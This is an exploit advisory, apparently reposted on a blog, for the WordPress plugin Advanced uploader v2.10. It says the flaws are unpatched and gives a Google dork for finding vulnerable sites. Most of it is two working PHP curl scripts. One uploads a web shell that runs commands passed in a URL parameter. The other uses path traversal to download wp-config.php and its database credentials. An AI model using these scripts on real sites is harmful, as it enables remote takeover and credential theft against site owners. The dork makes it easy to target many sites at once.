#-Title: WordPress Plugin Advanced uploader v2.10 - Multiple Vulnerabilities
#-Author: KedAns-Dz
#- E-mail : ked-h (@hotmail. com)
#- E-mail : ked-h (@hotmail. com)
#-Date: 05/12/15
#-Link Download : wordpress. org/plugins/advanced-uploader/
#-Google Dork: inurl:wp-content/plugins/advanced-uploader/
#-Tested on : Windows, Linux
#-Fixed in : ??
////////////////////////////////////////////////////////////////////////////////////////////
Description :
Wordpress plugin Advanced uploader v2.10 is suffer from multiple vulnerabilities remote attacker can upload file/shell/backdoor and exec commands or disclosure some local files.
Solution:
Currently, we are not aware of any vendor-supplied patches.
-- Proof Of Concept --
File Upload :
<?php
// page : upload.php
// lines : 1030... 1037
$postData = array();
$postData['file'] = "@3xploi7.php";
/* 3xploi7.php : <?php system($_GET["dz"]); ?> */
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http:/[localcrot].com/wp-content/plugins/advanced-uploader/upload.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData );
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
File Download :
<?php
// page : upload.php
// lines : 1219... 1237
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$[target].com/wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../../../../../../wp-config.php%00");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
Tidak ada komentar:
Posting Komentar